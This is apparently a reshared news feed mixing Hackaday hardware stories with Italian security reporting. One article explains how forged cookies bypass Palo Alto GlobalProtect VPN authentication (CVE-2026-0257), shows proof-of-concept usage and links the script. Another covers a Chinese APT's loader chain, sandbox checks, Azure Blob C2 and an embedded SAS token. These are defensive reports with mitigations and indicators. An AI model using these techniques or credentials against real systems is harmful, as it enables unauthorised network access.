Running an optical character recognition (OCR) server might sound like it would need some powerful hardware, like a rack-mounted, water-cooled machine, or at least a nice desktop or laptop. But if you have the time, anything could be used. [Hemant] has a long-running personal project that processes a lot of image data over a long time, and set up the OCR server on an iPhone 8 running entirely with solar power, rather than turn to more typical hardware.

Part of what makes this task feasible for low-powered hardware is Apple’s Vision framework, which uses machine learning to aid in things like character recognition (among other tasks). It will run on an iPhone just as easily as a Mac. The phone’s built-in battery already provides the first step of an off-grid setup. This build relies on a separate power bank to integrate the phone with the solar panel more easily. On the software side, [Hemant] reports that the true challenge wasn’t setting up the server as much as it was keeping the iPhone from sleeping or stopping his program from running full-time.

A system like this running off-grid, especially considering the costs of the solar panel and power bank, might seem counterproductive. But when comparing electricity costs for running the same software on his server, he estimates he saves about $10 per month with this setup, which has a payback of somewhere around 2-3 years. Not too bad for a phone that would have otherwise ended up in a landfill. Old phones can be surprisingly good choices for servers, too. It helps if they can run Linux, but plenty of phones will support server applications, even when running their native OS.


hackaday.com/2026/05/31/off-gr…

Cybersecurity & cyberwarfare ha ricondiviso questo.

Having a particularly hard time today with the simultaneous death of the climate, software development and the rule of law. And especially cheesed off with the people riding these waves for profit.

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

US healthcare still stupidly expensive, with pathetic outcomes, study finds
L: arstechnica.com/health/2026/05…
C: news.ycombinator.com/item?id=4…
posted on 2026.05.31 at 16:41:10 (c=3, p=7)

reshared this

Hackaday Links: May 31, 2026


The media in this post is not displayed to visitors. To view it, please log in.

Hackaday Links Column Banner

If you’re located in the Northeast United States and thought you heard an explosion yesterday afternoon, it wasn’t just your imagination — multiple sources have now confirmed that a 1 meter (3 foot) meteor entered the Earth’s atmosphere and broke up in the air off the coast of Massachusetts, releasing the energy equivalent of 300 tons of TNT.

Well, maybe. The latest update from NASA says it might actually qualify as a meteorite, with radar data indicating that debris from the space rock may have fallen into Cape Cod Bay. For those unfamiliar, the difference between a meteor and a meteorite is whether or not any of the object survived its encounter with the atmosphere and made it down to the surface.

There’s an argument to be made that a larger asteroid would have likely set off some alarm bells as it approached the planet, but the fact that this deep space interloper showed up unannounced is a sobering reminder that our ability to detect incoming threats isn’t nearly as robust as we’d like. Fortunately, it looks like the event didn’t result in any serious damage or injury.

Magnet fishers in Cape Cod are stoked.
Speaking of mid-air threats, here’s a reminder of what not to do on an airliner: on Saturday a flight departing Newark airport for Spain had to turn around when it was discovered a Bluetooth device bearing the name “BOMB” was onboard. There was no actual explosive device found on the plane when it was searched upon its return, and reports are that the whole incident was the result of an Ill-conceived device name on a portable speaker.

The details on this one are interesting, as a first-hand account posted to Reddit would seem to indicate that both the flight crew and teams back at United Airlines headquarters in Chicago were able to see the Bluetooth devices on the plane in real-time. The passengers were actually given several chances to turn off their devices before the order was given to turn the plane around, and at one point the crew claimed they were even able to see the number of Bluetooth devices that were still active.

Admittedly, it could have been as simple as one of the crew members using an app on their phone to see how many discoverable Bluetooth devices they could pick up and reporting their findings back to the home office. But in the modern security climate, it’s not hard to imagine that the aircraft has some form of integrated Wireless Intrusion Detection System (WIDS). Something to keep in mind the next time they ask you to put your gadgets into airplane mode during takeoff.

It seems like every week we’ve been reporting on some service going dark, and today is no different. As pointed out by OMG Ubuntu, Canonical will be shutting down the Ubuntu Pastebin service in June. In fact, originally it was supposed to go offline today, but they’ve pushed the date back by a month due to the response from the community. Turns out giving your users just a few days to pack up their belongings before kicking them to the digital curb isn’t popular. Who knew?

Now granted Hackaday is geared more towards hardware than software, but a search through the database would seem to indicate we’ve never once run a post that linked to Ubuntu Pastebin in the 18 years the service has been available. Conversely, we had pages of results when searching our back catalog for instances of the classic pastebin.com. So we’re actually curious about this one and would love to hear from the readers: how many of you were actually using this service regularly, and will you miss it?

Finally, those in the market may be interested to hear that Wells Fargo will start offering mortgages for 3D printed homes produced by the Texas-based ICON Technologies. They’ve even got a special incentive program lined up for the extruded domiciles, offering a lender credit that can offset some of the closing costs.

This might not sound like that big of a deal, but apparently most banks have been understandably skeptical of the technology and the long-term market for 3D printed homes up to this point. After all, it was just a few years ago that a recently completed 3D printed home in Iowa had to be demolished after the structure fell short of safety standards. As pointed out by CNBC, previous communities produced with ICON’s concrete printing technology had to be financed through the developer.

We’re still not sure that 3D printed homes make a whole lot of sense, but making the technology more accessible is surely a net positive. Even if the current state of the art in house squirting isn’t quite there, you know how the old saying goes: a journey of a thousand miles begins with a single layer.


See something interesting that you think would be a good fit for our weekly Links column? Drop us a line, we’d love to hear about it.


hackaday.com/2026/05/31/hackad…

A Camera Viewfinder Makes A Great TV


The media in this post is not displayed to visitors. To view it, please log in.

When we think of CRT camera viewfinders, most of us probably imagine the tiny CRTs you’d find in a 1980s camcorder. They’re super cute and a load of fun to play with, but they’re very much a consumer device. Professional cameras of the type you’d find in a studio had their own viewfinders, which were a lot closer to a small TV. They’re about as high quality as it gets for a monochrome CRT, and [Evan Monsma] has done the conversion to a general-purpose monitor.

On one side, this is a very straightforward hack, simply a case of tracing wires to identify the power and video pins. Given a tool battery, the monitor fires up and gives a super-sharp picture. What we like about this is the wooden base he’s made for the thing, at the same time rough-and-ready, and professional-looking from the outside. It has a routed space for the cables, and once mounted flush with the monitor base and given a bit of wood stain, it looks almost as though it was manufactured that way.

It’s likely most of us won’t find a broadcast viewfinder in the trash, instead settling at best for a little Chinese portable TV. But it’s still interesting to see these unusual devices. Perhaps it might make a good cyberdeck.

youtube.com/embed/ZIvf0IzS9Xs?…

Thanks [Luis] for the tip!


hackaday.com/2026/05/31/a-came…

Cybersecurity & cyberwarfare ha ricondiviso questo.

CVE-2026-0257: Rapid7 Caught Attackers Abusing Forged VPN Cookies Against Multiple Customers
securityaffairs.com/192933/sec…
#securityaffairs #hacking #PaloAltoNetworks

reshared this

4-bit Relay Logic Counter Begs To Have Its Buttons Pushed


The media in this post is not displayed to visitors. To view it, please log in.

What’s one to do with some nice little relays of questionable pinout, and prototyping board? How about a quietly clicky 4-bit counter using relay logic with tons of buttons?
The register with LEDs and buttons is on the top board, the incrementer on the bottom board.
[Agatha Mallett] made the counter after finding herself in possession of a quantity of relays burdened by terrible documentation (the datasheet shockingly lacks a pinout, and doesn’t even mention the coil being unidirectional). But since the relays are also small and of decent quality, they were a good candidate for a small relay logic-based project.

The key to the build is implementing D-type flip-flops using relays. This is done by holding the coil voltage of each relay between its set and release voltage levels. A small voltage bump will energize the coil, closing the relay and leaving it closed. Conversely, a small negative spike releases the coil, leaving it open. This forms the basis of the counter, and [Agatha] has a separate write-up all about the details of using relays in this way.

Implementing this was rather less straightforward than it may sound because it relies on balancing the coils of many relays on a figurative knife-edge of voltage, but not every component is perfectly identical. A tweaked resistor or capacitor here and there was needed before things settled into reliability.

The end product has indicator LEDs, buttons to increment or clear the current count, and it even has buttons to set or clear individual bits. This is a project that begs to be interacted with, and there’s a short video on the project page so you can watch it go through its paces.

Thanks to [Jess] for the tip!


hackaday.com/2026/05/31/4-bit-…

Cybersecurity & cyberwarfare ha ricondiviso questo.

Ayah! È uscita la Nuova Release Bomba di @ufficiozero !

E non potevo certo esimermi dal recensirla per voi! Un caloroso grazie a @BoostMediaAPS per avermi fatta avere in anteprima mondiale la Distribuzione #Linux Italiana più usata al Mondo!

E voi, siete pronti a questa #Rivoluzione digitale?

youtu.be/g-f80iOryvo?is=gx5zR-…

@linux

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

PostHog says it's currently experiencing a security incident. The analytics company said it's "rotating keys after a security research team was able to confirm an exploit in one of our AWS environments," referring to Amazon Web Services.

Incident page: posthogstatus.com/incidents/01…

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

SECURITY AFFAIRS #MALWARE #NEWSLETTER ROUND 99
securityaffairs.com/192928/sec…
#securityaffairs #hacking

The media in this post is not displayed to visitors. To view it, please log in.

CVE-2026-0257: Palo Alto GlobalProtect sotto attacco — cookies bypassano l’autenticazione VPN


@Informatica (Italy e non Italy)
Rapid7 MDR ha documentato due ondate di sfruttamento attivo di CVE-2026-0257, un bypass dell'autenticazione GlobalProtect di Palo Alto Networks. Gli attaccanti forgiano cookie validi usando la chiave pubblica TLS dell'appliance,


CVE-2026-0257: Palo Alto GlobalProtect sotto attacco — cookies bypassano l’autenticazione VPN


Rapid7 MDR ha documentato lo sfruttamento attivo di CVE-2026-0257, una vulnerabilità di autenticazione che colpisce PAN-OS e Prisma Access di Palo Alto Networks. Gli attaccanti hanno dimostrato che è possibile forgiare cookie di autenticazione validi usando solo la chiave pubblica estratta dal certificato TLS dell’appliance esposta su Internet — senza credenziali, senza accesso fisico. Il 29 maggio 2026 la vulnerabilità è stata aggiunta al catalogo CISA KEV (Known Exploited Vulnerabilities).

Il problema: autenticazione override senza verifica della firma


La feature “authentication override” di GlobalProtect permette al portal o gateway di emettere cookie che gli utenti già autenticati possono riutilizzare nelle sessioni successive — un meccanismo simile ai bearer token. La vulnerabilità nasce da un difetto nel modo in cui questi cookie vengono validati lato server.

Quando un appliance è configurato in modo che il certificato usato per cifrare/decifrare i cookie di override sia lo stesso certificato usato per il servizio HTTPS del portal o gateway, si crea un problema critico: la chiave pubblica di quel certificato è accessibile pubblicamente a chiunque si connetta all’appliance. Chiunque conosca la chiave pubblica può forgiare un cookie di autenticazione arbitrario. Sul lato server, il cookie viene decifrato, ma il contenuto viene accettato implicitamente senza alcuna verifica della firma.

Il risultato pratico: un attaccante non autenticato può stabilire una connessione VPN come qualsiasi utente — incluso l’account admin locale — senza conoscere alcuna credenziale.

La cronologia degli attacchi osservati


Rapid7 ha identificato due distinte ondate di sfruttamento nelle settimane successive alla pubblicazione del bollettino Palo Alto (13 maggio 2026).

Prima ondata — 17-18 maggio 2026: Rapid7 MDR ha rilevato un alert “Suspicious VPN Authentication – Local Account Logon via Generic Non-Human Identity” su più ambienti cliente. L’analisi ha rilevato autenticazioni via cookie all’account admin locale provenienti da IP associati all’hosting provider Vultr, con un hostname client di GP-CLIENT e sistema operativo Linux.

# Log GlobalProtect - Prima ondata (18 maggio 2026)
<14>May 18 01:51:37 palovpn-01 1,2026/05/18 01:51:37,010101010101,GLOBALPROTECT,0,2817,
2026/05/18 01:51:37,vsys1,gateway-auth,login,Cookie,,admin,US,
GP-CLIENT,104.207.144.154,0.0.0,0.0.0.0,0.0.0.0,
aa:bb:cc:dd:ee:ff,,6.0.0,,Linux,"linux-64",1,,,
"Auth latency: 78ms, profile: local_auth_profile",success,,0,,0,
GP-Gateway,0101010101010101010,0x0,2026-05-18T01:51:37.264-05:00

Seconda ondata — 21 maggio 2026: Una seconda serie di attacchi è partita da IP associati a Dromatics Systems. L’elemento comune che ha permesso a Rapid7 di attribuire entrambe le ondate allo stesso threat actor è il MAC address spoofato aa:bb:cc:dd:ee:ff — un placeholder generico che non corrisponde a nessuna scheda di rete reale. In questa seconda ondata, in 2 casi su 10 l’appliance ha concesso anche l’assegnazione di un IP VPN, dando all’attaccante accesso alla rete interna.
# Log GlobalProtect - Seconda ondata (21 maggio 2026)
<14>May 21 01:54:39 FW-PA-A 1,2026/05/21 01:54:38,010101010101,GLOBALPROTECT,0,2818,
2026/05/21 01:54:38,vsys1,gateway-auth,login,Cookie,,admin,US,
DESKTOP-GP01,146.19.216.125,0.0.0.0,0.0.0.0,0.0.0.0,
aa:bb:cc:dd:ee:ff,,6.0.0,Windows,"Microsoft Windows 10 Pro , 64-bit",1,,,
"Auth latency: 1019ms, profile: SAML-o365-GP",success,,0,,0,
GlobalProtect_External_Gateway,0101010101010101010,0x8000000000000000,
2026-05-21T01:54:39.142-05:00

Il proof-of-concept pubblico: forge_cookie.py


Rapid7 Labs ha sviluppato e pubblicato su GitHub uno script Python che automatizza il test di vulnerabilità. Lo script scarica la catena di certificati dall’appliance target, itera su ogni certificato estraendone la chiave pubblica, forgia un cookie di autenticazione per ciascuna chiave e verifica quale viene accettata dal gateway GlobalProtect. La disponibilità pubblica del PoC abbassa significativamente la barriera d’ingresso per gli attaccanti.

# Utilizzo di forge_cookie.py (PoC pubblico Rapid7)
$ python3 forge_cookie.py --target 192.168.86.99 --user haxor
[*] Retrieving certificate chain from 192.168.86.99:443 ...
  Found 2 certificate(s) in chain:
  [0] CN=192.168.86.99 (RSA 2048 bits, CA=False)
  [1] CN=GP-Lab-CA (RSA 2048 bits, CA=True)
[*] Forging cookie for user 'haxor', testing each key
  Trying [0] CN=192.168.86.99
  [-] Failure - Gateway did not accepted the forged cookie
  Trying [1] CN=GP-Lab-CA
  [+] Success - Gateway accepted the forged cookie
  Cookie: ng9ygxlaclylNXeSHcakXZPK06Fno0svVirz6RhRtA5m...

Versioni vulnerabili e mitigazione


La vulnerabilità è presente in PAN-OS 10.2, 11.1, 11.2 e 12.1, nonché in Prisma Access 10.2.0 e 11.2.0, nelle versioni precedenti alle patch rilasciate da Palo Alto Networks. La condizione di vulnerabilità richiede che la feature “authentication override” sia abilitata e che il certificato usato per i cookie venga condiviso con il servizio HTTPS del portal/gateway.

Le mitigazioni prioritarie sono: aggiornare immediatamente alle versioni patchate indicate nel bollettino ufficiale; in alternativa, disabilitare la feature authentication override; oppure generare un certificato dedicato esclusivamente a quella feature, senza condividerlo con altri servizi. Anche con la vulnerabilità non patchata, quest’ultima opzione neutralizza il vettore di attacco.

Indicatori di compromissione (IoC)

# IP attaccanti osservati da Rapid7
104.207.144.154   # Vultr - Prima ondata
146.19.216.119    # Dromatics Systems - Seconda ondata
146.19.216.120    # Dromatics Systems
146.19.216.125    # Dromatics Systems
# MAC address spoofato (comune ad entrambe le ondate)
aa:bb:cc:dd:ee:ff
# Hostname client osservati nei log GlobalProtect
GP-CLIENT         # Linux, prima ondata (17-18 maggio)
DESKTOP-GP01      # Windows, seconda ondata (21 maggio)
# Versioni PAN-OS vulnerabili (esempi)
PAN-OS 10.2.8
PAN-OS 12.1.4-h6
# Script PoC
forge_cookie.py (https://github.com/sfewer-r7/CVE-2026-0257)

Il report completo con la technical analysis della funzione main_DecryptAppAuthCookie e le detection rule per InsightIDR è disponibile sul blog di Rapid7. Il bollettino ufficiale Palo Alto è consultabile su security.paloaltonetworks.com.

The media in this post is not displayed to visitors. To view it, please log in.

Operation Dragon Weave: l’APT cinese usa Azure Blob Storage come C2 per colpire Repubblica Ceca e Taiwan


@Informatica (Italy e non Italy)
Seqrite ha identificato Operation Dragon Weave, una campagna APT attribuita con moderata confidenza a un attore cinese che colpisce funzionari e ricercatori in Repubblica Ceca e Taiwan. Il payload finale


Operation Dragon Weave: l’APT cinese usa Azure Blob Storage come C2 per colpire Repubblica Ceca e Taiwan


Seqrite ha svelato Operation Dragon Weave, una campagna di spearphishing attribuita con moderata confidenza a un attore cinese che ha preso di mira funzionari governativi, accademici e aziende tecnologiche in Repubblica Ceca e Taiwan. L’elemento più sofisticato dell’operazione è il payload finale, AZUREVEIL: un agente C2 basato sul framework Adaptix che sfrutta Microsoft Azure Blob Storage come canale di comando-e-controllo, rendendo il traffico malevolo praticamente indistinguibile dalle normali comunicazioni cloud enterprise.

Il contesto geopolitico: perché Repubblica Ceca e Taiwan


La scelta dei target non è casuale. La Repubblica Ceca ha rafforzato negli ultimi anni i legami con Taiwan e ha adottato posizioni critiche nei confronti di Pechino su temi come Huawei e i diritti umani. Taiwan rimane il teatro principale delle ambizioni di raccolta intelligence di Pechino, con un interesse particolare verso il settore tecnologico — semiconduttori, difesa, ricerca avanzata. I documenti-esca usati nell’operazione erano scritti sia in cinese tradizionale che in lingua ceca, confermando la natura mirata e localizzata della campagna.

I settori colpiti includono pubblica amministrazione e settore governativo, ricerca e accademia, tecnologia e software, e servizi finanziari — un profilo tipico delle operazioni di cyberspionaggio state-sponsored.

La catena di infezione: due percorsi, stesso payload finale


L’infezione inizia con un archivio ZIP inviato via spearphishing. All’interno, la vittima trova un documento esca in formato PDF insieme a uno di questi file: un LNK malevolo o un eseguibile compilato in Rust. Indipendentemente dalla scelta della vittima, entrambi i percorsi convergono sulla stessa catena di payload.

Percorso A (LNK-based): Il file LNK esegue silenziosamente uno script VBScript minimalista (empty.vbs) il cui unico compito è avviare Profile.ps1 tramite PowerShell. Questo script PowerShell decrittografa il file 1.dat e rilascia RuntimeBroker_update.exe.

Percorso B (Executable-based): Un eseguibile Rust estrae direttamente tutti i componenti necessari, replicando il risultato del percorso A senza passare per VBScript e PowerShell.

In entrambi i casi, RuntimeBroker_update.exe — che si maschera con il nome di un legittimo processo Windows — esegue il DLL sideloading caricando una versione malevola di UnityPlayer.dll. Questa DLL è il loader RUSTCLOAK.

RUSTCLOAK: il loader Rust con evasione sandbox


RUSTCLOAK è un loader scritto in Rust che implementa diverse tecniche di evasione prima di caricare il payload finale. Prima di procedere, verifica il nome del computer della macchina su cui è in esecuzione, confrontandolo con una lista di nomi tipici degli ambienti di analisi e sandbox:

Nomi macchina rilevati come sandbox da RUSTCLOAK:
- DESKTOP-NAKFFMT
- JULIA-PC
- ARCHIBALD-PC

Se il controllo è superato, RUSTCLOAK decrittografa il payload finale attraverso quattro strati di cifratura: XOR, RC4, Base64 e SM4 (un algoritmo di cifratura a blocchi sviluppato e standardizzato in Cina). L’uso di SM4 è un interessante indicatore contestuale che rafforza la valutazione sull’attribuzione all’attore cinese. Il payload decrittografato — AZUREVEIL — viene caricato direttamente in memoria senza toccare il disco.

AZUREVEIL: l’agente C2 che si nasconde nel cloud Microsoft


AZUREVEIL è un agente per il framework open-source Adaptix C2 con una caratteristica distintiva: usa Microsoft Azure Blob Storage come canale dead-drop per il comando-e-controllo. Invece di comunicare con un server C2 dedicato — facilmente bloccabile — l’agente carica beacon cifrati su un container Azure e legge i comandi dall’operatore dallo stesso container. Tutto il traffico transita su HTTPS verso domini legittimi Microsoft (*.blob.core.windows.net), rendendo il filtraggio estremamente difficile senza bloccare anche i servizi cloud aziendali legittimi.

AZUREVEIL supporta 36 comandi, tra cui: enumerazione di file, directory e dischi logici; listing dei processi in esecuzione e delle named pipe; enumerazione degli adattatori di rete; process injection; reflective loading di eseguibili in memoria; esecuzione di BOF (Beacon Object Files) in memoria; port forwarding e proxy SOCKS per il pivoting; download e upload di file.

Indicatori di compromissione (IoC)

# Infrastruttura C2
note1ggbbhggdwa1[.]blob[.]core[.]windows[.]net
# File names - delivery iniziale
計畫申請審查結果通知單.pdf.lnk
_計畫申請審查結果通知單.exe
# Componenti dropper/loader
RuntimeBroker_update.exe
UnityPlayer.dll (malevola)
BrowserViewUtility.exe
empty.vbs
Profile.ps1
1.dat
Com.dat
# Hash SHA-256 (campioni principali)
096372d19b4787e989f44e04c5ecc29885aa927c34ae8666628d6c0eb20bb447
1c56228cbd1bdebb9e5ea55c2749150fee06c865ede4a3754e8bd6843e51d2d4
# SAS Token Azure (hardcoded nel payload cifrato)
sv=2024-11-04&ss=b&srt=sco&sp=rwdlaciytfx&st=2026-03-19T09:20:44Z
&se=2027-03-19T17:35:44Z&spr=https&sig=ECJjJIIE9Ou75dwiHhliC4fWccdBpLX9u580AX9TGwY=
# Computer names usati come check sandbox
DESKTOP-NAKFFMT
JULIA-PC
ARCHIBALD-PC

Due righe per i difensori


L’abuso di servizi cloud legittimi come Azure Blob Storage per il C2 è una tecnica sempre più diffusa tra gli APT, poiché consente di bypassare molti controlli basati su reputazione o blacklist. Per i team di difesa, le azioni prioritarie includono: monitorare il traffico verso domini *.blob.core.windows.net non generato da applicazioni aziendali note; implementare regole YARA per il rilevamento delle tecniche di DLL sideloading con nomi di processo che imitano componenti Windows legittimi; analizzare i log degli endpoint alla ricerca di VBScript che eseguono PowerShell con parametri di decifratura; bloccare l’esecuzione di file LNK da archivi ZIP via policy. Il SAS token hardcoded nel payload è una firma stabile che può essere usata per il rilevamento retroattivo su EDR e log di rete.

Il report completo con tutti gli IoC, i MITRE ATT&CK mapping e l’analisi tecnica dettagliata è disponibile sul blog di Seqrite Labs.


Cybersecurity & cyberwarfare ha ricondiviso questo.

Security Affairs #newsletter Round 579 by Pierluigi Paganini – INTERNATIONAL EDITION
securityaffairs.com/192918/sec…
#securityaffairs #hacking

Loading Sega Genesis Games Off a Vinyl Record


The media in this post is not displayed to visitors. To view it, please log in.

Recently [Throaty Mumbo] took a poke at another daft idea, in the form of loading Sega Genesis games off vinyl records. Although a whacky idea, it’s made possible through the use of a Mega Everdrive Pro and its ability to load games via its USB port, a feature mostly intended for on-the-fly game development without swapping SD cards.

For a few decades in home computing, the loading of software from cassette tapes and similar media was very common. This was due to the low-cost nature of this ubiquitous technology compared to alternatives like cartridges and floppy disks. Even if it was famously unreliable and slow, this accessibility made it a very popular choice. This is where home game consoles were different, as they generally used very fast cartridges, but what if you merge these two worlds?

As demonstrated, a Pico 2 board with its RP2350 MCU is used to convert the audio signal containing the binary data into data for transmission via USB to the Everdrive cartridge. After confirming that it works with a tape drive, he drags in a plastic-y PO-80 5″ record cutter and player, where the mono audio limitation is not a problem.

Unfortunately, this PO-80 turns out to be exactly the kind of toy it looks like, with [Throaty Mumbo] unable to cut and play back a record that gets a clean enough signal to the Pico 2 board, though with a better player and likely record cutter it should work fine. After all, some magazines back in the day came with plastic ‘vinyl’ records that contained programs you could load from your record player.

Although technically a failure, it does demonstrate that if you are very patient, you can totally load Sega Genesis ROMs off a tape or record at a blistering couple of kB/s, tops.

youtube.com/embed/c744iD0_fWU?…


hackaday.com/2026/05/31/loadin…